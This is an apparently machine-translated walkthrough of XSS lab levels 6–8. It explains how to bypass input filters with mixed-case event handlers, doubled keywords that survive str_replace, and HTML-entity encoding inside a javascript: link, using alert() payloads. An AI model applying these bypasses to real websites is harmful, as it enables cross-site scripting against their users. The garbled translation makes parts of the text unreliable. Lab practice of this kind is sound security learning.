leve6:
Figure 1. a try "οnclick =" alert (), without success, and then view the page source code found on the onclick event of the character replacement, php logic there may be a search for the term, if found to be character insertion.
2. So try to enter the case, then there might only be interested php logic lowercase, on and oN On ON is not the same, but with onclick Onclick ONclick oNclick is the same, can be performed.
3. Try payload: "oNclick =" alert (1), perfect to get around, perform the next level
level7:
1. The old way, first try "οnclick =" alert (1), click on the input box found did not respond, see the source code, the key results of the onclick string truncation, became click = "alert (1)";
2. guess php code is likely to use str_replace () has been replaced, so the use of payload: "onοnclick =" alert (1), successfully bypassed. Happy next level
level8:
1. This level for a long time, I Xueyibujing ah, as usual submitted a "οnclick =" alert (1), Figure 2, find the event on the character replacement, and "had a html coding entity, also there is more than one connection. at this time there are three places below the title is displayed payload.1 2 is the input box 3 is at the bottom of the Links. "post code, found only carried xss at the junction to the.
2. So constructed payload: javascript:. Alert (1) that everything is all right, I'm just about to boast ** is a genius, results, click the link did not respond, view the source code was found, and the characters are filtered, is output to javasc_ript: alert (1), is really a headache, find the next Internet information can be found html entities encode a single character, but without affecting the code runs. S at this time is encoded.
Coding method: the environment into the python, the execution code ord ( 's') Input: 115, 115 plus added before after & #; last payload is: java & # 115; cript: alert ( 'sss')
3. Click Links directly to the next level.
